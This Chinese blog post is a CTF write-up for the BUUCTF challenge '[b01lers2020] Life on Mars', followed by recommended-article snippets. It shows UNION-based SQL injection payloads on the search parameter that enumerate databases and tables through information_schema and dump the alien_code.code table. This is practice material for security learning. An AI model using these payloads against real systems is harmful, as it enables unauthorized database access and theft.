[b01lers2020]Life on Mars 一个接口的sql schema.schemate表

最新推荐文章于 2024-06-15 20:21:51 发布
最新推荐文章于 2024-06-15 20:21:51 发布
阅读量471 收藏 11
点赞数 10
分类专栏: BUUctf 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134865187
版权

这里还是很简单的

啥也没有

然后抓包看看

发现传递参数 直接尝试sql

然后如果正确就会返回值 否则 返回1

chryse_planitia union select database(),version()

发现回显 直接开始注入

chryse_planitia union select database(),version()


chryse_planitia union select database(),group_concat(table_name) from information_schema.tables where table_schema="aliens"

 太多了 不切实际一个一个查 看看有没有其他数据库

chryse_planitia union select database(),group_concat(schema_name) from information_schema.schemata

然后就是正常的注入

最后查值的时候

from alien_code.code 即可
/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code

双层小牛堡
关注
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
b01lers-ctf b01lers-ctf的公开发布文件。... 如果没有,请创建一个github问题,我们将修复该问题。 如果您需要更多帮助,请随时与b01lers-ctf discord上的DM创建者联系。 没有承诺,他们会回应,我们很忙。
FZHei-B01.zip
05-13
FZHei-B01字体,windows下 latex 应用字体,利用管理员模式安装即可,成功后可消除相关latex缺少字体报错。
[b01lers2020]Life on Mars
qq_57861415的博客
04-02 115
[b01lers2020]Life on Mars
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2921
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
B01诚信因素识别分析及信息收集记录.docx
12-05
B01诚信因素识别分析及信息收集记录.docx
otp_win64_R15B01.rar
08-13
otp_win64_R15B01
B01诚信因素识别分析及信息收集记录-示例.doc
11-26
B01诚信因素识别分析及信息收集记录-示例.doc
[b01lers2020]Life on Mars (难发现的sql注入)
qq_62046696的博客
11-21 558
打开界面以后,查看各种都没有提示,果断扫描目录,但也是没获得什么。到这里只能burp抓个包看看 抓包两个界面发现了get传参,考虑是否存在sql注入尝试额以后发现只返回了一个1,试一下别的引号闭合 直接进行查询所有的数据库名 看一下alien_code数据库 发现code ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.cod
BUUCTF--[b01lers2020]Life on Mars
qq_46263951的博客
07-22 457
进入页面后什么也没发现,通过抓包看到一个可以参数 跟着参数走可以看到一个这样的页面 看大佬的wp接下来使用联合查询进行探测 当查询两个字段时可以正常显示 /query?search=amazonis_planitia union select 1,2 使用sqlmap扫描 扫描到这几个库,看名字应该是在alien_code中 扫描该库的 扫描该的列名 然后使用sqlmap --dump 不出来内容,只好手动 成功获得flag...
BUUCTF__[b01lers2020]Life on Mars_题解
风过江南乱的博客
05-06 686
BUUCTF [b01lers2020]Life on Mars sql联合注入
[b01lers2020]Life on Mars WRITE UP
Swee
09-21 425
拿到网站没啥好说的,基本是静态的页面,先抓包。 发现包有问题,search参数 非常的奇怪 经初步判定有SQL注入 ORDER BY 2 得到 有两个参数 进行联合查询,得到所有数据库的名称 发现有个贼奇怪的 叫alien_code 进去看看 /query?search=amazonis_planitia%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_sc
PostgreSQL17优化器改进(4)允许UNION(没有ALL)使用MergeAppend
m0_61738548的博客
06-15 722
PostgreSQL17优化器改进(4)允许UNION(没有ALL)使用MergeAppend
【AI+编程】工作日常场景随时可以AI编程,记一个问答SQL快速导出数据日常示例
最新发布
月晓风清
06-15 262
为了实现你需要的操作,即以问题名称作为头,答案作为内容导出,你可以通过JOIN操作连接三个,然后利用动态SQL语句进行行转列转换(PIVOT)。然后通过执行这个动态生成的SQL,你可以得到一个格,中的每一行示一个成员,对应每个问题的答案作为列数据。然后,在动态生成的SQL语句中利用JOIN把db_member、db_question和db_answer连接起来,并根据question_id和member_id进行匹配,以输出每个成员对应的问题答案。下面是假定结构,实际场景和它类似。
写一个FPGA的PCIE接口测试用例
06-02
下面是一个简单的FPGA的PCIE接口测试用例,用于测试PCIE Gen2 x1接口。这个例子使用Verilog语言编写。 ```verilog module pcie_test( input clk, input reset, input [31:0] write_data, output [31:0] read_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值